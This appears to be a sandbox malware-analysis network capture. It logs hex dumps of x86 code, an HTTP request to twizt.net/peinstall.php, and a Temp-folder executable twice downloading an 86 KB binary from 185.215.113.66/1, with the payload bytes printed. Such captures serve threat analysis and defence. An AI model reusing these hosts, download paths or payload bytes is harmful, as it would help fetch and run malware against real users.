                                                                        Apr 24, 2024 10:06:58.146421909 CEST1289INData Raw: 00 55 8b 6c 24 08 8b 45 20 56 33 f6 57 8b 7c 24 20 85 c0 74 1c 8b 4f 04 39 08 75 0a 66 8b 50 04 66 3b 57 02 74 09 8b 40 1c 85 c0 75 eb eb 02 8b f0 85 f6 75 22 6a 20 e8 95 8f 00 00 8b f0 8b 47 04 89 06 66 8b 4f 02 66 89 4e 04 8b 55 20 89 56 1c 83
                                                                        Data Ascii: Ul$E V3W|$ tO9ufPf;Wt@uu"j GfOfNU Vu L$|$FD$PQtuS$NrdF;wX}xttSW`AuD$$MPSWUNxF;uF+tP9RQA)~[_^]
                                                                        Apr 24, 2024 10:06:58.146461010 CEST1289INData Raw: ff 15 30 02 41 00 6a 01 8d 54 24 28 52 6a 04 66 89 44 24 1a c6 44 24 30 01 8b 46 08 68 ff ff 00 00 50 ff 15 28 02 41 00 8b 56 08 6a 10 8d 4c 24 10 51 52 ff 15 88 02 41 00 83 f8 ff 75 12 56 e8 e4 fd ff ff 83 c4 04 5e 5b 33 c0 5f 83 c4 10 c3 6a 00
                                                                        Data Ascii: 0AjT$(RjfD$D$0FhP(AVjL$QRAuV^[3_jjVh@jj^AF^[_FS2Ul$;FvNPQFFFT$FWRP~;uF;vu]F[Ft;r+F][+n][
                                                                        Apr 24, 2024 10:06:58.146500111 CEST1289INData Raw: 38 85 ff 74 24 83 bf 60 02 00 00 ff 74 16 8b bf 80 02 00 00 85 ff 75 ed 56 ff 15 04 01 41 00 e9 80 00 00 00 e8 e6 fd ff ff 56 ff 15 04 01 41 00 eb 72 ff d7 2b c6 3d 10 27 00 00 72 67 8d 43 20 50 ff 15 00 01 41 00 8b 73 38 85 f6 74 42 6a 00 8d 56
                                                                        Data Ascii: 8t$`tuVAVAr+='rgC PAs8tBjVRdAn+r`tP`uC PA8AD$CjPlA_^[]S`AUl$`WjVjD$Pj~WQ
                                                                        Apr 24, 2024 10:06:58.146538019 CEST1289INData Raw: ff 00 00 33 c9 50 c6 87 75 02 00 00 01 66 89 4c 24 3e ff 15 28 02 41 00 8b 8f 60 02 00 00 51 ff 15 2c 02 41 00 c7 87 60 02 00 00 ff ff ff ff 5f 5e 83 c4 1c c3 cc 83 ec 0c 55 8b 2d 2c 00 41 00 56 57 8b 7c 24 1c 6a ff 8d 44 24 14 50 8b 47 08 8d 4c
                                                                        Data Ascii: 3PufL$>(A`Q,A`_^U-,AVW|$jD$PGL$QT$ 3RPt$(t$ t$$L$;twSu*T$ RT$jD$ P`RPPAu\A\$D$L$VjL$QOT$RD$$3PQt$,t$$t$(L$;u[_^]
                                                                        Apr 24, 2024 10:06:58.146574974 CEST1289INData Raw: 51 6a 0c e8 b5 7d 00 00 83 c4 04 89 45 fc 6a 01 e8 e8 03 00 00 83 c4 04 8b 4d fc 89 01 8b 55 fc 8b 02 c7 00 00 00 00 00 8b 4d fc c7 41 04 00 00 00 00 8b 55 fc c7 42 08 01 00 00 00 8b 45 fc 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b
                                                                        Data Ascii: Qj}EjMUMAUBE]UQEMU:tME8t#MQREQUPDMAUBEQ"U]UEEMQURAEPMQUREQ'
                                                                        Apr 24, 2024 10:06:58.146612883 CEST1289INData Raw: 11 3b 55 e8 73 09 8b 45 f0 83 c0 01 89 45 f0 8b 4d ec 0f af 4d f4 8b 55 08 89 4a 04 8b 45 08 8b 48 04 03 4d f0 8b 55 08 89 4a 04 33 c0 8b e5 5d c3 cc cc cc 55 8b ec 83 ec 30 8b 45 14 25 00 00 00 80 75 1a 8b 4d 0c c7 01 00 00 00 00 8b 55 08 c7 02
                                                                        Data Ascii: ;UsEEMMUJEHMUJ3]U0E%uMUE%EMMU%EMUEHMUB%EM;MUt&E+EEMMMU;UvEEE
                                                                        Apr 24, 2024 10:06:58.146650076 CEST1289INData Raw: 8d 55 ec 52 e8 42 fa ff ff 83 c4 0c 8b 45 ec 03 45 f4 89 45 ec 8b 4d ec 3b 4d f4 73 09 8b 55 f0 83 c2 01 89 55 f0 8b 45 f8 03 45 e4 8b 4d 08 8b 55 ec 03 14 81 89 55 ec 8b 45 f8 03 45 e4 8b 4d 08 8b 55 ec 3b 14 81 73 09 8b 45 f0 83 c0 01 89 45 f0
                                                                        Data Ascii: URBEEEM;MsUUEEMUUEEMU;sEEMMUEMMkUUEM3]U8EPMQUREPMQUR}EEPMQjEU+UU}uF}u
                                                                        Apr 24, 2024 10:06:58.146687031 CEST1289INData Raw: 08 8b 45 08 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 08 8b 45 10 50 8b 4d 08 51 8d 55 f8 52 e8 19 f5 ff ff 83 c4 0c 8b 45 fc 3b 45 0c 73 06 33 c0 eb 24 eb 20 8b 4d fc 3b 4d 0c 76 09 b8 01 00 00 00 eb 13 eb 0f 8b 55 f8 3b 55 14 76
                                                                        Data Ascii: E]UEPMQURE;Es3$ M;MvU;Uv3]U0EEMMEUUE;EsMUEEEEMMU;UEEMUPMUPMQP
                                                                        Apr 24, 2024 10:06:58.146724939 CEST1289INData Raw: 81 00 00 00 00 eb c2 8b 45 10 33 d2 b9 20 00 00 00 f7 f1 89 55 ec 8b 55 14 2b 55 e4 8b 45 0c 8b 14 90 8b 4d ec d3 e2 89 55 e8 83 7d ec 00 74 1e 8b 45 14 50 8b 4d ec 51 8b 55 08 52 8b 45 08 50 e8 64 ff ff ff 83 c4 10 0b 45 e8 89 45 e8 8b 45 e8 eb
                                                                        Data Ascii: E3 UU+UEMU}tEPMQUREPdEEEzMMMU +EEEEMMU;Us6EM#UMUEMMUEMUUE^]UV} EE
                                                                        Apr 24, 2024 10:06:58.485579014 CEST1289INData Raw: 8d 45 fc 50 e8 f7 ea ff ff 83 c4 04 33 c9 75 da 33 c0 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 18 d1 e0 50 e8 a1 ea ff ff 83 c4 04 89 45 fc 8b 4d 18 51 8b 55 10 52 8b 45 0c 50 8b 4d fc 51 e8 e6 ef ff ff 83 c4 10 8b 55 18 52 8b
                                                                        Data Ascii: EP3u3]UQEPEMQUREPMQUREPMQUREP}tMQUREPt3u3]UEPMQUREPMQ]U EEMQEUR
                                                                        Apr 24, 2024 10:07:02.924985886 CEST176OUTGET /peinstall.php HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                        Host: twizt.net
                                                                        Apr 24, 2024 10:07:03.365341902 CEST184INHTTP/1.1 200 OK
                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                        Date: Wed, 24 Apr 2024 08:07:03 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.649713185.215.113.66806684C:\Users\user\AppData\Local\Temp\135143440.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Apr 24, 2024 10:07:08.998130083 CEST166OUTGET /1 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                        Host: 185.215.113.66
                                                                        Apr 24, 2024 10:07:09.334203959 CEST1289INHTTP/1.1 200 OK
                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                        Date: Wed, 24 Apr 2024 08:07:09 GMT
                                                                        Content-Type: application/octet-stream
                                                                        Content-Length: 86272
                                                                        Last-Modified: Tue, 23 Apr 2024 21:15:20 GMT
                                                                        Connection: keep-alive
                                                                        ETag: "662824e8-15100"
                                                                        Accept-Ranges: bytes
                                                                        Data Raw: a8 4a f5 c3 4d 1e 89 ed 25 ad 4f 3b 68 ed 08 ba 62 02 f5 3e e5 71 7c d2 8a 81 92 a8 64 31 86 38 dc e1 cd 87 12 04 19 ea d1 c9 79 a1 00 a8 7a b6 06 d8 d2 d1 ad 21 c1 69 e6 d6 73 7e b2 94 f7 80 9f 96 01 92 0f 8b 13 23 cc ff 38 49 0f 77 72 a8 da 4b 60 7b d1 04 ee ff a5 bd 8e cf 56 23 15 db 17 a4 73 e1 bd 8f fe f3 80 6b ec 3f ea d0 f3 21 3e fb 3a e6 f4 0d 0f f0 0c ce 5b c5 d1 c7 9d 08 74 55 7a 82 54 f5 5d 3c b7 18 6e 69 67 6b 3f 75 a1 18 db 21 dd 6a 9a ea b7 d9 50 cc e4 e7 e5 22 d3 3c 53 a6 42 90 c9 d5 08 4e 78 44 15 b0 d8 bf 11 7c 56 cd 0f a1 28 44 ae 62 96 bf f4 fc ef 16 f3 bd b7 1d 44 de c3 a1 21 23 23 fc 67 9c ac 93 34 43 5f 0f 8f b2 fd f7 8c 65 bd 2f 15 e0 fd 81 71 50 7a 3d 53 81 55 c5 77 d6 a0 07 8f 42 a2 b4 18 8a 33 af 44 b2 6b 07 89 00 c0 1c cc ce 53 b0 0f 52 ce f7 63 3f c2 db 1b fc b1 d5 3d 1d 42 1c 82 ac 44 97 03 1c 77 0d 6b 9c b0 2f bb cf ed b5 4c 09 e1 72 99 31 95 9c 7b 73 b7 0a c2 b5 10 b2 4a 9f 67 95 1e e8 81 48 04 52 34 8c 59 e3 30 58 90 ca 24 69 0c b0 4a 33 a0 0c c1 76 c4 90 62 96 1d 8a 1e 09 f9 39 be dc 6d c2 97 a0 77 10 d2 08 01 b2 62 6f be e1 f6 f7 1f a7 65 08 ad 7a 6e bf cd b2 fb 55 9c 62 87 56 eb 2c 61 60 52 08 3a 90 e5 37 02 40 df 6f 74 b3 3b bf 2a e7 47 7a 74 5f 4c b1 f5 ec 9b 7f 43 73 a2 6b ed e6 be e8 c7 6a 4a ea cf 80 8e 68 e3 ff a5 3b 6e d6 29 91 f5 5d e6 48 22 3e c5 72 37 58 b6 4a 03 0c 3f 19 0a d4 79 9e fc 81 35 ce ca 88 5a 9f 27 e0 e2 87 d5 86 4a 4b c9 f4 20 64 dc e4 d5 26 65 eb 09 43 ae a1 26 ec 1a b5 a1 2f db 92 db ee 1c 5a ba 98 65 7e e7 87 da e2 b0 fc e3 90 8b 2c 39 51 9a f3 9e 48 3d 38 9c b6 45 62 0c 6a 63 8e fb 6d df 94 67 86 41 9f 01 54 7b a5 e6 2b d8 7a f1 84 fc 52 c2 33 fd 9c 1d 5a 35 12 6f 9e 42 90 ee 6c a9 0a 2b 43 05 ae a5 bb 4b f7 c6 10 f8 1b 37 57 de 22 ff d5 43 f1 bf eb 24 89 f0 17 6f b2 5f aa 96 b8 a8 69 58 64 cb ac f8 30 91 64 77 39 e7 de fc 05 aa 44 59 3e 23 09 75 9e a2 d2 05 bc 6e 50 e8 72 f6 ee ae 96 0d d8 21 15 51 57 d7 df 22 90 98 d1 4a 32 f6 ff 63 3d dd dc e6 71 7e ab 94 c2 21 7e 76 8a b6 d2 0a 70 9e b0 76 68 4c b0 9c 49 21 9a f3 c5 5f 68 ba e4 b9 a2 2f b5 9f 54 7f 47 fb d0 64 43 66 56 67 81 dd dd 7e 90 2f d5 1a 77 29 0a bd a7 43 5f 38 04 21 58 d6 38 2b 7b 48 40 77 7f 81 86 0f 4a a6 83 bc 73 f8 48 24 1c 42 38 79 9e b9 e1 6c a4 35 66 12 19 54 21 97 7e af 92 02 71 4d 92 62 d4 20 7c 41 f7 b5 62 0c c3 6f b6 fa 9f b3 83 d5 06 c5 df 10 f0 cc 69 18 f0 b1 fc 92 10 40 b8 ca 52 18 e5 1f e4 b1 43 35 fd 31 b0 34 46 98 7b 9b f3 02 05 33 df 66 6e 70 0b 66 0e ed 05 2e 2c 4f 1f 2f a6 89 f2 b1 c4 aa 28 18 75 70 75 2e 03 36 f2 17 cc cd 16 ec 50 6d ee f4 46 74 4f 65 34 be 40 69 91 ed 34 15 69 4d b9 56 4d fd 08 22 4a 9c b2 13 df c8 60 77 fe 51 b1 e0 0d 0d ca 89 8a 4c 73 dc 94 de 64 ce e7 aa 64 99 48 a5 4f 32 22 c6 7a 17 43 d9 bf 6d a7 d6 68 37 17 29 68 e5 2c 8f 88 1c 9b 7a 15 f2 ef 73 92 a5 35 d3 d1 c3 98 34 d6 1b a7 3a db 5a 1e 98 f0 e3 d6 d9 2a fd b6 f0 ba ca 8f c6 b0 ef 11 21 b0 55 03 12 ac 32 b1 84 3b 7d 09 60 0a b7 c4 e6 14 a2 90 f8 49 88 b3 79 d3 8a f0 0a c9 91 32 af 8d c9 26 fb 60 d1 68 5b d8 98 07 fc 19 7e 57 86 31 b5 04 7a fd 5b b3 ac 1e 62 62 16 37 88 e5 10 ad ba 6f 9c 98 78
                                                                        Data Ascii: JM%O;hb>q|d18yz!is~#8IwrK`{V#sk?!>:[tUzT]<nigk?u!jP"<SBNxD|V(DbD!##g4C_e/qPz=SUwB3DkSRc?=BDwk/Lr1{sJgHR4Y0X$iJ3vb9mwboeznUbV,a`R:7@ot;*Gzt_LCskjJh;n)]H">r7XJ?y5Z'JK d&eC&/Ze~,9QH=8EbjcmgAT{+zR3Z5oBl+CK7W"C$o_iXd0dw9DY>#unPr!QW"J2c=q~!~vpvhLI!_h/TGdCfVg~/w)C_8!X8+{H@wJsH$B8yl5fT!~qMb |Aboi@RC514F{3fnpf.,O/(upu.6PmFtOe4@i4iMVM"J`wQLsddHO2"zCmh7)h,zs54:Z*!U2;}`Iy2&`h[~W1z[bb7ox
                                                                        Apr 24, 2024 10:07:09.334244967 CEST1289INData Raw: d5 7b 0b 1e 78 9c ea 64 cd 53 48 60 6d 26 78 ad f2 45 08 0c c6 c5 b8 64 c4 4c 5a fe 02 ca 39 88 20 33 ab 45 a2 8c 64 bc 8d b6 05 f6 9d a5 58 39 54 37 1b 66 49 1e 3c 68 64 9f ec f2 5e eb f7 67 f5 3f 90 61 00 12 cf 6c 4b ac b9 ae 8e a0 55 83 e6 df
                                                                        Data Ascii: {xdSH`m&xEdLZ9 3EdX9T7fI<hd^g?alKUw$Ro.ewU7jKLQs?=~c=x+G#s6W.V{r-tFU(FC_/nQaK5T,_2fn0sq_{?*V$,V{gDi
                                                                        Apr 24, 2024 10:07:09.334285021 CEST1289INData Raw: d3 ba 70 f8 7b 03 35 cc af 43 6f 96 fe 29 a4 13 f9 a5 28 c9 f9 63 7b 67 2b eb d0 09 9b 5b 1b ef 51 89 bd 83 f1 27 eb 08 c1 15 b3 4a c8 26 45 e3 c0 aa d5 58 94 33 f2 74 b2 57 37 5a 8b d3 4c c0 38 03 d2 64 c7 b7 c6 bf e7 08 18 8c c4 10 da 14 0b 1f
                                                                        Data Ascii: p{5Co)(c{g+[Q'J&EX3tW7ZL8dI!-Ty'G>)W8r,QE%CIFhF>3ku!Z}5bdr^A^v1")r$MAhehC5q"BU"$tA"
                                                                        Apr 24, 2024 10:07:09.334323883 CEST1289INData Raw: e5 f7 c7 26 bc 85 8a 6c c9 58 78 e2 3e c4 d1 9c 5e 13 f1 b8 f3 3d c1 c1 1a b0 95 ab 3e 96 bb b4 ec d0 8e 14 c0 52 53 0f ca 6a 63 d8 43 ab a0 f9 01 93 f0 18 a9 56 0e 9c 6b 39 49 79 6c aa b2 79 cb fb 1d 18 e3 81 32 de 3a e6 19 41 15 ba 92 06 5d 7d
                                                                        Data Ascii: &lXx>^=>RSjcCVk9Iyly2:A]}-,.!$%G*`O<Qlqt~Xv,l%>8J#|9tKT><}[^;n]/JuLRg\9SI=$@:@yw3$``T5=9a'gew1
                                                                        Apr 24, 2024 10:07:09.334362030 CEST1289INData Raw: 68 69 89 81 7c 2d 98 58 e2 47 ac 6a d7 bd 10 49 61 d9 ce 1c 44 05 52 88 7f 72 d7 f7 39 59 c9 55 2f c3 1b 07 fd b5 e8 c7 d3 52 32 5d bd fc 01 5c ff ac c9 64 77 ab a9 5b ad a2 0d dd d8 36 ae 57 ad 3e 77 fa 7b a6 54 1f 51 e7 4b 93 50 4a 66 44 3a 52
                                                                        Data Ascii: hi|-XGjIaDRr9YU/R2]\dw[6W>w{TQKPJfD:R=u`4nf_t0H[(=m(!Y)Sj0)PR*.FBoLjlGtnNa)9Q_nS4<0ql1('^qzw^ ?}k3KJS<
                                                                        Apr 24, 2024 10:07:09.334403038 CEST1289INData Raw: f2 7d da 93 7a 3a 14 25 2b 44 e3 ab 9b 5a 60 0c ae e0 95 34 a7 43 92 15 80 58 9c 5d ac cf 08 bd b6 75 fb 90 62 4c 39 23 dc 8d f5 44 f2 bd dc 65 c1 d8 1b 97 41 c9 76 8c bf f0 a2 c0 e2 58 d9 2e 5f 8f 50 91 46 17 88 27 54 c2 c0 99 de db cb 81 fd 2b
                                                                        Data Ascii: }z:%+DZ`4CX]ubL9#DeAvX._PF'T+gW+Sfs7AOL#.#Z,*#Y6)i%[){#G2/DrWyXTTS_a21zs{DOVX]e){J}Rx}{a]*!qk%wDv
                                                                        Apr 24, 2024 10:07:09.334443092 CEST1289INData Raw: ce 1e ad 79 cb c8 53 17 44 a1 fb 59 e4 97 27 7c 4d f1 ee 2e 3f 59 6d 99 27 99 ae 80 74 c9 a1 5e db 58 83 4a d9 f7 c4 43 b2 53 12 d9 ca 23 56 87 1f 61 99 51 97 21 4a fb f1 fe 44 5b 59 6e 44 7a 5d a0 69 d3 99 4b 80 48 a6 cc 67 45 82 d8 79 6a 2f 29
                                                                        Data Ascii: ySDY'|M.?Ym't^XJCS#VaQ!JD[YnDz]iKHgEyj/)$FowfW_x"#UU4Ca/H:!]2?3khpQY9bw^S`y6oPFh&iQNm%&gw>>GD`b
                                                                        Apr 24, 2024 10:07:09.334497929 CEST1289INData Raw: b8 1a ef 7a 58 1e 2a 5a f0 ca a0 98 f4 93 fa 72 45 df 40 f4 39 37 e1 f9 0d 4d 2c e2 a7 80 52 67 ff 64 a0 6e cb f7 15 17 66 a9 48 a3 58 85 7c 8e 14 64 16 ef d3 0e fc 99 ed f1 18 a7 67 41 ac 1e 1f 8f 7d 33 8f 5e e2 ba a4 98 30 4a 97 b6 3f 2b 69 2d
                                                                        Data Ascii: zX*ZrE@97M,RgdnfHX|dgA}3^0J?+i-${*2|w'yc|]Agx07MW&<$-+WEd4$ySsh7o%X*D FQA5${`?+L9m|'D^
                                                                        Apr 24, 2024 10:07:09.334542036 CEST1289INData Raw: 75 5c 5e a0 0b 76 65 93 a0 62 d6 54 b0 02 66 24 b4 8d 51 47 5e 14 01 6e fb 0d 22 05 69 69 05 41 6a 9a d6 7b a2 25 a8 b4 03 44 fc f6 0b 97 87 1f 32 f3 e3 e9 7a e4 b1 f5 00 a9 0d fe 64 a3 f9 bc 8e 83 ea b9 b7 09 87 3c 51 35 b9 6b ad eb 85 d5 24 b5
                                                                        Data Ascii: u\^vebTf$QG^n"iiAj{%D2zd<Q5k$h!\'0'#ORZo3.,U`9k,zh@NJv:>T<7!QazBdV(>Pg??qL2?Rr)\'[LYM`$
                                                                        Apr 24, 2024 10:07:09.334579945 CEST1289INData Raw: a5 d8 15 2a 35 55 70 8c 74 ac 02 e6 0b c7 b2 65 ec 18 44 cc a0 61 15 44 ab c5 a7 92 a5 c9 e5 73 5c 0a e1 72 bd 6a 4f 72 b8 57 56 47 bf 55 10 96 ba 13 54 e1 d4 0a 19 50 3e 36 02 58 83 4f 97 d7 ce 0c 9c 61 47 53 85 df f9 19 3c d8 cc 9a 11 f5 ce c9
                                                                        Data Ascii: *5UpteDaDs\rjOrWVGUTP>6XOaGS<S)QGKv3A?)R,YrZBmd.6=\,{'ut|.G%umnnfE~dT=D-%7}=]V#+W$Bh
                                                                        Apr 24, 2024 10:07:09.669584036 CEST1289INData Raw: dc b2 d8 2f 48 af 15 31 37 75 9b 82 b2 90 3a 8b 99 d6 d0 f7 73 0f 16 fa 34 16 42 6b ba 11 83 7a 5a af 85 2b ba 2f 96 f6 9a 44 06 89 df 25 19 4b b7 62 2e 01 67 be b2 1e ae b4 99 71 f0 2c 33 6e e9 78 d2 39 3e b3 b1 d8 c6 38 47 81 bc 09 26 9c b5 2a
                                                                        Data Ascii: /H17u:s4BkzZ+/D%Kb.gq,3nx9>8G&*?~SDrd g&YF41zFI>lWgy.mfmd&pC?t/VazmMQrI;\BEj[zm}/1M>H%


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.649714185.215.113.66806684C:\Users\user\AppData\Local\Temp\135143440.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Apr 24, 2024 10:07:11.901932001 CEST166OUTGET /1 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                        Host: 185.215.113.66
                                                                        Apr 24, 2024 10:07:12.240331888 CEST1289INHTTP/1.1 200 OK
                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                        Date: Wed, 24 Apr 2024 08:07:12 GMT
                                                                        Content-Type: application/octet-stream
                                                                        Content-Length: 86272
                                                                        Last-Modified: Tue, 23 Apr 2024 21:15:20 GMT
                                                                        Connection: keep-alive
                                                                        ETag: "662824e8-15100"
                                                                        Accept-Ranges: bytes
                                                                        Data Raw: a8 4a f5 c3 4d 1e 89 ed 25 ad 4f 3b 68 ed 08 ba 62 02 f5 3e e5 71 7c d2 8a 81 92 a8 64 31 86 38 dc e1 cd 87 12 04 19 ea d1 c9 79 a1 00 a8 7a b6 06 d8 d2 d1 ad 21 c1 69 e6 d6 73 7e b2 94 f7 80 9f 96 01 92 0f 8b 13 23 cc ff 38 49 0f 77 72 a8 da 4b 60 7b d1 04 ee ff a5 bd 8e cf 56 23 15 db 17 a4 73 e1 bd 8f fe f3 80 6b ec 3f ea d0 f3 21 3e fb 3a e6 f4 0d 0f f0 0c ce 5b c5 d1 c7 9d 08 74 55 7a 82 54 f5 5d 3c b7 18 6e 69 67 6b 3f 75 a1 18 db 21 dd 6a 9a ea b7 d9 50 cc e4 e7 e5 22 d3 3c 53 a6 42 90 c9 d5 08 4e 78 44 15 b0 d8 bf 11 7c 56 cd 0f a1 28 44 ae 62 96 bf f4 fc ef 16 f3 bd b7 1d 44 de c3 a1 21 23 23 fc 67 9c ac 93 34 43 5f 0f 8f b2 fd f7 8c 65 bd 2f 15 e0 fd 81 71 50 7a 3d 53 81 55 c5 77 d6 a0 07 8f 42 a2 b4 18 8a 33 af 44 b2 6b 07 89 00 c0 1c cc ce 53 b0 0f 52 ce f7 63 3f c2 db 1b fc b1 d5 3d 1d 42 1c 82 ac 44 97 03 1c 77 0d 6b 9c b0 2f bb cf ed b5 4c 09 e1 72 99 31 95 9c 7b 73 b7 0a c2 b5 10 b2 4a 9f 67 95 1e e8 81 48 04 52 34 8c 59 e3 30 58 90 ca 24 69 0c b0 4a 33 a0 0c c1 76 c4 90 62 96 1d 8a 1e 09 f9 39 be dc 6d c2 97 a0 77 10 d2 08 01 b2 62 6f be e1 f6 f7 1f a7 65 08 ad 7a 6e bf cd b2 fb 55 9c 62 87 56 eb 2c 61 60 52 08 3a 90 e5 37 02 40 df 6f 74 b3 3b bf 2a e7 47 7a 74 5f 4c b1 f5 ec 9b 7f 43 73 a2 6b ed e6 be e8 c7 6a 4a ea cf 80 8e 68 e3 ff a5 3b 6e d6 29 91 f5 5d e6 48 22 3e c5 72 37 58 b6 4a 03 0c 3f 19 0a d4 79 9e fc 81 35 ce ca 88 5a 9f 27 e0 e2 87 d5 86 4a 4b c9 f4 20 64 dc e4 d5 26 65 eb 09 43 ae a1 26 ec 1a b5 a1 2f db 92 db ee 1c 5a ba 98 65 7e e7 87 da e2 b0 fc e3 90 8b 2c 39 51 9a f3 9e 48 3d 38 9c b6 45 62 0c 6a 63 8e fb 6d df 94 67 86 41 9f 01 54 7b a5 e6 2b d8 7a f1 84 fc 52 c2 33 fd 9c 1d 5a 35 12 6f 9e 42 90 ee 6c a9 0a 2b 43 05 ae a5 bb 4b f7 c6 10 f8 1b 37 57 de 22 ff d5 43 f1 bf eb 24 89 f0 17 6f b2 5f aa 96 b8 a8 69 58 64 cb ac f8 30 91 64 77 39 e7 de fc 05 aa 44 59 3e 23 09 75 9e a2 d2 05 bc 6e 50 e8 72 f6 ee ae 96 0d d8 21 15 51 57 d7 df 22 90 98 d1 4a 32 f6 ff 63 3d dd dc e6 71 7e ab 94 c2 21 7e 76 8a b6 d2 0a 70 9e b0 76 68 4c b0 9c 49 21 9a f3 c5 5f 68 ba e4 b9 a2 2f b5 9f 54 7f 47 fb d0 64 43 66 56 67 81 dd dd 7e 90 2f d5 1a 77 29 0a bd a7 43 5f 38 04 21 58 d6 38 2b 7b 48 40 77 7f 81 86 0f 4a a6 83 bc 73 f8 48 24 1c 42 38 79 9e b9 e1 6c a4 35 66 12 19 54 21 97 7e af 92 02 71 4d 92 62 d4 20 7c 41 f7 b5 62 0c c3 6f b6 fa 9f b3 83 d5 06 c5 df 10 f0 cc 69 18 f0 b1 fc 92 10 40 b8 ca 52 18 e5 1f e4 b1 43 35 fd 31 b0 34 46 98 7b 9b f3 02 05 33 df 66 6e 70 0b 66 0e ed 05 2e 2c 4f 1f 2f a6 89 f2 b1 c4 aa 28 18 75 70 75 2e 03 36 f2 17 cc cd 16 ec 50 6d ee f4 46 74 4f 65 34 be 40 69 91 ed 34 15 69 4d b9 56 4d fd 08 22 4a 9c b2 13 df c8 60 77 fe 51 b1 e0 0d 0d ca 89 8a 4c 73 dc 94 de 64 ce e7 aa 64 99 48 a5 4f 32 22 c6 7a 17 43 d9 bf 6d a7 d6 68 37 17 29 68 e5 2c 8f 88 1c 9b 7a 15 f2 ef 73 92 a5 35 d3 d1 c3 98 34 d6 1b a7 3a db 5a 1e 98 f0 e3 d6 d9 2a fd b6 f0 ba ca 8f c6 b0 ef 11 21 b0 55 03 12 ac 32 b1 84 3b 7d 09 60 0a b7 c4 e6 14 a2 90 f8 49 88 b3 79 d3 8a f0 0a c9 91 32 af 8d c9 26 fb 60 d1 68 5b d8 98 07 fc 19 7e 57 86 31 b5 04 7a fd 5b b3 ac 1e 62 62 16 37 88 e5 10 ad ba 6f 9c 98 78
                                                                        Data Ascii: JM%O;hb>q|d18yz!is~#8IwrK`{V#sk?!>:[tUzT]<nigk?u!jP"<SBNxD|V(DbD!##g4C_e/qPz=SUwB3DkSRc?=BDwk/Lr1{sJgHR4Y0X$iJ3vb9mwboeznUbV,a`R:7@ot;*Gzt_LCskjJh;n)]H">r7XJ?y5Z'JK d&eC&/Ze~,9QH=8EbjcmgAT{+zR3Z5oBl+CK7W"C$o_iXd0dw9DY>#unPr!QW"J2c=q~!~vpvhLI!_h/TGdCfVg~/w)C_8!X8+{H@wJsH$B8yl5fT!~qMb |Aboi@RC514F{3fnpf.,O/(upu.6PmFtOe4@i4iMVM"J`wQLsddHO2"zCmh7)h,zs54:Z*!U2;}`Iy2&`h[~W1z[bb7ox
                                                                        Apr 24, 2024 10:07:12.240355968 CEST1289INData Raw: d5 7b 0b 1e 78 9c ea 64 cd 53 48 60 6d 26 78 ad f2 45 08 0c c6 c5 b8 64 c4 4c 5a fe 02 ca 39 88 20 33 ab 45 a2 8c 64 bc 8d b6 05 f6 9d a5 58 39 54 37 1b 66 49 1e 3c 68 64 9f ec f2 5e eb f7 67 f5 3f 90 61 00 12 cf 6c 4b ac b9 ae 8e a0 55 83 e6 df
                                                                        Data Ascii: {xdSH`m&xEdLZ9 3EdX9T7fI<hd^g?alKUw$Ro.ewU7jKLQs?=~c=x+G#s6W.V{r-tFU(FC_/nQaK5T,_2fn0sq_{?*V$,V{gDi
                                                                        Apr 24, 2024 10:07:12.240401983 CEST1289INData Raw: d3 ba 70 f8 7b 03 35 cc af 43 6f 96 fe 29 a4 13 f9 a5 28 c9 f9 63 7b 67 2b eb d0 09 9b 5b 1b ef 51 89 bd 83 f1 27 eb 08 c1 15 b3 4a c8 26 45 e3 c0 aa d5 58 94 33 f2 74 b2 57 37 5a 8b d3 4c c0 38 03 d2 64 c7 b7 c6 bf e7 08 18 8c c4 10 da 14 0b 1f
                                                                        Data Ascii: p{5Co)(c{g+[Q'J&EX3tW7ZL8dI!-Ty'G>)W8r,QE%CIFhF>3ku!Z}5bdr^A^v1")r$MAhehC5q"BU"$tA"
                                                                        Apr 24, 2024 10:07:12.240461111 CEST1289INData Raw: e5 f7 c7 26 bc 85 8a 6c c9 58 78 e2 3e c4 d1 9c 5e 13 f1 b8 f3 3d c1 c1 1a b0 95 ab 3e 96 bb b4 ec d0 8e 14 c0 52 53 0f ca 6a 63 d8 43 ab a0 f9 01 93 f0 18 a9 56 0e 9c 6b 39 49 79 6c aa b2 79 cb fb 1d 18 e3 81 32 de 3a e6 19 41 15 ba 92 06 5d 7d
                                                                        Data Ascii: &lXx>^=>RSjcCVk9Iyly2:A]}-,.!$%G*`O<Qlqt~Xv,l%>8J#|9tKT><}[^;n]/JuLRg\9SI=$@:@yw3$``T5=9a'gew1
                                                                        Apr 24, 2024 10:07:12.240525007 CEST1289INData Raw: 68 69 89 81 7c 2d 98 58 e2 47 ac 6a d7 bd 10 49 61 d9 ce 1c 44 05 52 88 7f 72 d7 f7 39 59 c9 55 2f c3 1b 07 fd b5 e8 c7 d3 52 32 5d bd fc 01 5c ff ac c9 64 77 ab a9 5b ad a2 0d dd d8 36 ae 57 ad 3e 77 fa 7b a6 54 1f 51 e7 4b 93 50 4a 66 44 3a 52
